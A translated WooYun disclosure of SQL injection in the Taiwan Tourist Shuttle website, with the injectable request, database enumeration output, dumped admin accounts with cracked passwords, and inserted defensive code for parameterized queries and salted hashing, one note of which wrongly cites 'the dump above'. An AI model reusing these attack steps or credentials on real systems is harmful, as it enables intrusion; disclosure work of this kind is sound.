
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0159580

Title: SQL injection in the 台灣好行 (Taiwan Tourist Shuttle) official website (16 administrator accounts involved, passwords recovered / admin back end accessed / all itineraries, schedules, routes and attractions controllable) (Taiwan region)

Vendor: 台灣好行 official website

Reporter: 路人甲

Submitted: 2015-12-09 12:47

Fixed: 2016-01-25 18:01

Published: 2016-01-25 18:01

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: handed to a third-party partner organisation (HITCON Taiwan vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:

Bookmarked by 4 users


Vulnerability details

Disclosure status:

2015-12-09: details sent to the vendor, awaiting vendor handling
2015-12-14: vendor confirmed; details visible to the vendor only
2015-12-24: details opened to core white hats and domain experts
2016-01-03: details opened to regular white hats
2016-01-13: details opened to intern white hats
2016-01-25: details opened to the public

Brief description:

The site belongs to the Tourism Bureau of the Ministry of Transportation (Taiwan Province) and carries a Google green label.

Detailed description:

台灣好行 official website
POST injection in the homepage search

http://**.**.**.**/Search/Do/


POST request:

POST /Search/Do/ HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/Main/Lang/?redirect=/Main/Index/&lang=zh-tw
Cookie: PHPSESSID=tp835upbb4qopb5gqo13q3bsu5; __utma=118975756.14135579.1449631688.1449631688.1449631688.1; __utmb=118975**.**.**.**9631688; __utmc=118975756; __utmz=118975756.1449631688.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
search_word=1
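The report shows only the request, not the server-side code. The following is an added example, not code from the site or from the reporter: it models a search handler that pastes search_word into the SQL text next to one that binds it as a parameter, which is the fix for this class of bug. The table name tt_scene is taken from the dump above; its columns, the sample rows and the use of SQLite in place of the site's MySQL are assumptions made so the example runs offline.

```python
import sqlite3

# Constructed sample rows standing in for the site's tt_scene table.
# The real schema is not on the page, so these columns are assumptions.
SAMPLE_SCENES = [
    ("Sun Moon Lake", "Nantou"),
    ("Taroko Gorge", "Hualien"),
    ("Alishan", "Chiayi"),
]


def make_db():
    """In-memory SQLite database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tt_scene (name TEXT, region TEXT)")
    conn.executemany("INSERT INTO tt_scene VALUES (?, ?)", SAMPLE_SCENES)
    return conn


def search_vulnerable(conn, search_word):
    """Pattern behind the reported bug: the POST field is concatenated into
    the SQL text. A quote in the input closes the string literal, so the
    rest of the input is executed as part of the query's logic."""
    sql = "SELECT name FROM tt_scene WHERE name LIKE '%" + search_word + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, search_word):
    """Hardened form: the SQL text is fixed and the value is bound as a
    parameter, so quotes, keywords and comment markers in it are plain
    characters. (LIKE wildcards in user input are a separate concern.)"""
    sql = "SELECT name FROM tt_scene WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + search_word + "%",))]
```

With an ordinary search term both functions return the same rows; with an input that contains a quote and a comment marker, the concatenated version returns every row while the parameterized one simply finds no scene with that literal name.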


[11:32:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0
[11:32:52] [INFO] fetching current user
[11:32:53] [INFO] retrieved: TBROC26@localhost
current user: 'TBROC26@localhost'


dbs

available databases [2]:
[*] information_schema
[*] TBROC26


Database: TBROC26
[57 tables]
+-------------------------+
| besttour_busstops |
| file |
| tt_acl_ctrl |
| tt_admin_group |
| tt_admin_group_acl |
| tt_admin_menu |
| tt_admin_menu_group |
| tt_admin_menu_group2 |
| tt_admin_response |
| tt_admin_user |
| tt_admin_user_old |
| tt_banner |
| tt_besttour |
| tt_besttour_busstops |
| tt_besttour_bustimes |
| tt_besttour_direction |
| tt_besttour_scene |
| tt_besttour_service |
| tt_besttour_service2 |
| tt_besttour_time |
| tt_besttour_time_link |
| tt_besttour_traffic |
| tt_controller_action |
| tt_event_register |
| tt_file |
| tt_group |
| tt_group_acl |
| tt_guestbook |
| tt_i18n |
| tt_i18n_data |
| tt_key_word |
| tt_lang |
| tt_link |
| tt_lottery |
| tt_news |
| tt_o_admin_menu |
| tt_o_admin_user |
| tt_o_file |
| tt_playtour |
| tt_playtour_scene |
| tt_qa |
| tt_qa_cate |
| tt_scene |
| tt_setting |
| tt_station |
| tt_station_map |
| tt_station_time |
| tt_system |
| tt_taiwantrip_set |
| tt_ticket_link |
| tt_time_link |
| tt_tour_date_type |
| tt_tour_time |
| tt_train_xml |
| tt_weather |
| tt_weather_week |
| zdrop_besttour_busstops |
+-------------------------+


The admin user table contains phone numbers, emails, usernames, passwords, login IPs, ...

+---------------+---------------------+
| Column | Type |
+---------------+---------------------+
| account | varchar(16) |
| admin_user_id | int(10) unsigned |
| avatar | int(11) unsigned |
| besttour_id | varchar(255) |
| create_time | timestamp |
| disabled | enum('T','F') |
| email | varchar(32) |
| group_id | tinyint(3) unsigned |
| last_login | datetime |
| modify_time | datetime |
| name | varchar(16) |
| password | varchar(32) |
| removed | enum('T','F') |
| sid | varchar(32) |
| super | enum('T','F') |
| user_agent | varchar(255) |
| user_ip | varchar(15) |
+---------------+---------------------+


Accounts and password hashes; most of the hashes have been cracked (recovered plaintext shown in parentheses):

| account | admin_user_id | avatar | besttour_id | create_time | disabled | email | group_id | last_login | modify_time | name | password | removed | sid | super | user_agent | user_ip |
| admin | 1 | 0 | NULL | 2010-07-28 14:37:45 | F | admin@**.**.**.** | 1 | 2010-08-02 16:03:18 | 2010-07-28 23:04:46 | ????? | 827ccb0eea8a706c4c34a16891f84e7b (12345) | F | <blank> | T | <blank> | <blank> |
| tirme | 2 | 0 | NULL | 2010-07-28 23:06:14 | F | tirme@**.**.**.** | 1 | 2010-07-28 23:12:01 | 2010-07-29 02:56:17 | ??? | d41d8cd98f00b204e9800998ecf8427e | F | <blank> | F | <blank> | <blank> |
| winny | 3 | 0 | NULL | 2010-08-14 21:47:31 | F | winny@**.**.**.** | 1 | 0000-00-00 00:00:00 | 2010-08-14 21:47:31 | winny | 4297f44b13955235245b2497399d7a93 (123123) | F | <blank> | F | <blank> | <blank> |
| tbroc | 5 | 0 | NULL | 2010-09-07 23:17:51 | F | b213999@**.**.**.** | 4 | 0000-00-00 00:00:00 | 2010-09-07 23:17:51 | tbroc | 0221d64d9a8accf56122e74cb36940b6 | F | <blank> | F | <blank> | <blank> |
| jeremy | 6 | 0 | NULL | 2010-09-28 12:18:37 | F | arkly365@**.**.**.** | 1 | 0000-00-00 00:00:00 | 2011-07-01 11:20:50 | jeremy | 827ccb0eea8a706c4c34a16891f84e7b (12345) | F | <blank> | F | <blank> | <blank> |
| clair | 7 | 0 | NULL | 2011-06-21 11:52:40 | F | clair@**.**.**.** | 1 | 0000-00-00 00:00:00 | 2011-06-21 11:52:40 | clair | e10adc3949ba59abbe56e057f20f883e (123456) | F | <blank> | F | <blank> | <blank> |
| yoyo | 8 | 0 | NULL | 2011-07-04 14:47:40 | F | yoyo@**.**.**.** | 1 | 0000-00-00 00:00:00 | 2011-07-04 14:47:40 | yoyo | e10adc3949ba59abbe56e057f20f883e (123456) | F | <blank> | F | <blank> | <blank> |
| yumin | 9 | 0 | NULL | 2011-07-20 10:41:32 | F | yumin@**.**.**.** | 5 | 0000-00-00 00:00:00 | 2011-07-20 10:41:32 | yumin | e10adc3949ba59abbe56e057f20f883e (123456) | F | <blank> | F | <blank> | <blank> |

(The name column for the first two accounts was lost to encoding in the original dump and is shown as question marks.)
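The password column above is a varchar(32) holding unsalted MD5 digests, and the dump shows the consequence: three accounts share one digest and two share another, so one recovered password unlocks several accounts. The following is an added example, not code from the site or the reporter. It first audits rows shaped like the dumped table for bare 32-hex digests and for digests shared between accounts, then shows the replacement scheme a maintainer would migrate to: PBKDF2-HMAC-SHA256 with a per-user random salt, plus a login path that verifies a legacy MD5 record once and hands back the upgraded value to store. The stored-value format and the function names are this example's own assumptions; the account names and digests are taken from the page.

```python
import hashlib
import hmac
import os
import re
from collections import Counter

# (account, stored password value) as dumped on the page.
LEGACY_ADMIN_ROWS = [
    ("admin", "827ccb0eea8a706c4c34a16891f84e7b"),
    ("tirme", "d41d8cd98f00b204e9800998ecf8427e"),
    ("winny", "4297f44b13955235245b2497399d7a93"),
    ("tbroc", "0221d64d9a8accf56122e74cb36940b6"),
    ("jeremy", "827ccb0eea8a706c4c34a16891f84e7b"),
    ("clair", "e10adc3949ba59abbe56e057f20f883e"),
    ("yoyo", "e10adc3949ba59abbe56e057f20f883e"),
    ("yumin", "e10adc3949ba59abbe56e057f20f883e"),
]

MD5_HEX = re.compile(r"^[0-9a-f]{32}$")


def audit_legacy_hashes(rows):
    """Return (accounts whose stored value is a bare 32-hex digest,
    {digest: [accounts]} for digests shared by more than one account).
    Identical digests mean identical passwords, which only shows up when
    no per-user salt is mixed in."""
    unsalted = [acct for acct, h in rows if MD5_HEX.match(h)]
    counts = Counter(h for _, h in rows)
    shared = {h: [a for a, hh in rows if hh == h]
              for h, n in counts.items() if n > 1}
    return unsalted, shared


# Replacement scheme. Stored format (an assumption of this example):
#   pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>
# The iteration count is stored so it can be raised for new records later.
ITERATIONS = 600_000


def hash_password(password, iterations=ITERATIONS):
    salt = os.urandom(16)  # fresh random salt per record
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iters, salt_hex, digest_hex = parts
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    # Constant-time comparison so the check leaks nothing about the digest.
    return hmac.compare_digest(dk.hex(), digest_hex)


def verify_and_upgrade(password, stored):
    """Login check for a table mid-migration. Returns (ok, new_value):
    a legacy MD5 record that verifies is accepted once and new_value is
    the PBKDF2 string to write back; otherwise new_value is None."""
    if MD5_HEX.match(stored):
        legacy = hashlib.md5(password.encode()).hexdigest()
        if hmac.compare_digest(legacy, stored):
            return True, hash_password(password)
        return False, None
    return verify_password(password, stored), None
```

Running the audit over the dumped rows reports every account as unsalted and lists the two shared digests with their account groups; after a successful legacy login the record is rewritten in the new format and the MD5 value never has to be consulted again.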


I scanned around and found no back end.
Later I tried /admin/
and the admin login page appeared by itself.

[screenshot]


Logged into the back end with a password obtained through the injection; guestbook messages can be managed.
More seriously, all routes and all itinerary assignments can be managed.

[screenshot]


Proof of vulnerability:

Remediation:

Copyright notice: please credit the source when reposting: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed: 2015-12-14 03:53

Vendor reply:

Thanks for the report.

Latest status:

None